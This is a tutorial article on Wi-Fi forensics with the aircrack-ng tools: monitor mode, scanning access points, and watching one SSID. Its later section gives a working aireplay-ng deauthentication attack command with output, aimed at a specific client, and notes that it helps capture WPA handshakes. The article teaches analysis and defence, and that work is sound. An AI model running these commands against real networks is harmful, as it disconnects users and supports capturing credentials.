Digital forensics

Wireless analysis

In this article, we will discuss how to perform wireless analysis, specifically on Wi-Fi networks. We will perform active packet capturing by using an external Wi-Fi card to understand how to identify information by capturing and analyzing 802.11 management traffic.

This information commonly includes:

Broadcast SSIDs
Access point MAC addresses
Supported encryption/authentication algorithms
Associated client MAC addresses

Learn Network Forensics

Get hands-on experience analyzing logs, protocols, wireless, web traffic and email for traces left behind by attackers.

Get Started

Monitoring traffic using aircrack-ng suite of tools

Aircrack-ng suite of tools is the most popular free suite of tools available for Wi-Fi security assessments, and it is worth understanding how some of these tools are used for wireless analysis. Moreover, these tools are commonly used by penetration testers.

Regardless of the tools used, it is important to know how to analyze the 802.11 traffic in order to understand some of the important aspects such as who is broadcasting the packets and who is connected to a specific access point.

Check the wireless interfaces available

We are going to use an external Wi-Fi card using USB on a Linux virtual machine. Kali Linux is the virtual machine in this case. The following output of iwconfig command shows the available wireless interfaces on the machine.

# iwconfig

wlan0 IEEE 802.11 ESSID:off/any

Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm

Retry short long limit:2 RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

eth0 no wireless extensions.

lo no wireless extensions.

wlan0 is the available wireless interface in this case.

One of the first steps to be able to capture Wireless network traffic is to put the wireless card in monitor mode. The command airmon-ng start wlan0 can be used to do it.

# airmon-ng start wlan0

PHY Interface Driver Chipset

phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

(mac80211 station mode vif disabled for [phy0]wlan0)

As we can see in the preceding excerpt, the wireless card is now kept in monitor mode. The new interface that is in monitor mode is wlan0mon in this case.

Scanning for the surrounding Wi-Fi access points

Once the wireless card is put in monitor mode, we can start scanning the surrounding networks that are within the range. This can be done using the following command.

#airodump-ng wlan0mon

Following is the output of the preceding command.

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

AC:E4:31:24:C4:93 -37 12 2 0 11 130 WPA2 CCMP PSK Garauyu_2.4G

88:54:FE:32:2F:CE -42 14 0 0 7 270 WPA2 CCMP PSK darksnade

78:62:8A:37:D2:B4 -49 12 0 0 5 130 WPA2 CCMP PSK ninja

50:62:C1:2B:C5:8D -49 24 1 0 5 195 WPA2 CCMP PSK partytime

The preceding excerpt shows the list of access points available within the wireless card’s range, the channels the access points are on, the mac addresses and the type of encryption they are configured with. Following are the details from the preceding example.

The column BSSID shows the mac address of the access point.
ESSID shows the SSID (service set identifier) of the access point.
ENC column shows the encryption used, which is WPA2 in this case for all access points.
CH column shows the channel the access point is on.

Monitoring a specific SSID

Clearly, the example shown earlier lists all the access points within the range of our wireless card. If there is a scenario, where we are interested in monitoring a specific access point, we can use the flag --essid and specify the ssid. This looks as follows.

#airodump-ng --essid "partytime" wlan0mon

The output of this command looks as follows.

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

50:62:C1:2B:C5:8D -47 6 18 8 5 195 WPA2 CCMP PSK partytime

BSSID STATION PWR Rate Lost Frames Probe

50:62:C1:2B:C5:8D E6:23:0E:4B:2B:FD -14 0 -24 338 116

As we can see in the preceding excerpt, the output contains only one access point named partytime. As we can notice, this access point is on channel 5. There are 11 channels routers can broadcast their signals on. These channels range from 1 to 11. The mac address under the column STATION is of the client device that is connected to the access point.

Set wireless card in a specific channel

There can be scenarios where the wireless card needs to be on the same channel as the target access point. For instance, an attacker wants to perform a deauthentication attack on a specific victim. This means, the attacker sends packets on behalf of the router to the victim and the victim will be disconnected from the access point. The card can be put on a specific channel using airmon-ng utility as shown below.

# airmon-ng start wlan0 5

The preceding command starts monitor mode on the interface wlan0 and the card will be on channel 5. Once the card is in the same channel as the router, an attacker can start sending deauthentication packets to the victim in order to disconnect the victim. The following command can be used to achieve this.

aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon

The 0 represents an unlimited amount of deauth packets.

-c is the client’s mac address we are targeting.
-a is the mac address of the router.
wlan0mon is the name of the network card that is in monitor mode.

Following is the output of the preceding command.

# aireplay-ng --deauth 0 -c E6:23:0E:4B:2B:FD -a 50:62:C1:2B:C5:8D wlan0mon

09:37:33 Waiting for beacon frame (BSSID: 50:62:C1:2B:C5:8D) on channel 5

09:37:34 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|53 ACKs]

09:37:35 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|59 ACKs]

09:37:36 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]

09:37:37 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|57 ACKs]

09:37:38 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|58 ACKs]

09:37:39 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [31|63 ACKs]

09:37:39 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [16|55 ACKs]

09:37:40 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|52 ACKs]

09:37:41 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|54 ACKs]

09:37:42 Sending 64 directed DeAuth (code 7). STMAC: [E6:23:0E:4B:2B:FD] [ 0|51 ACKs]

At this point of time, the victim gets disconnected from the router. This attack can cause denial of service on the victim.

Additionally, this can be useful when an attacker wants to capture the four-way handshake while a station is connecting to the access point. Understanding wireless attacks is probably one of the key requirements to understand how to investigate wireless attacks.

Learn Network Forensics

Get hands-on experience analyzing logs, protocols, wireless, web traffic and email for traces left behind by attackers.

Get Started

Conclusion

Having an external Wi-Fi card is one of the key aspects of active wireless sniffing and analysis. This article has demonstrated how one can use an external wireless card to actively capture and understand wireless traffic.

We used some of the tools from aircrack-ng suite of tools. We have also discussed how one can perform a deauthentication attack using aireplay-ng.

Sources

Network Forensics, Ric Messier

Internet Forensics: Using Digital Evidence to Solve Computer Crime, Robert Jones

Network Forensics: Tracking Hackers through Cyberspace, Sherri Davidoff

Posted: January 19, 2021

Srinivas

View Profile

Srinivas is an Information Security professional with 4 years of industry experience in Web, Mobile and Infrastructure Penetration Testing. He is currently a security researcher at Infosec Institute Inc. He holds Offensive Security Certified Professional(OSCP) Certification. He blogs atwww.androidpentesting.com. Email: srini0x00@gmail.com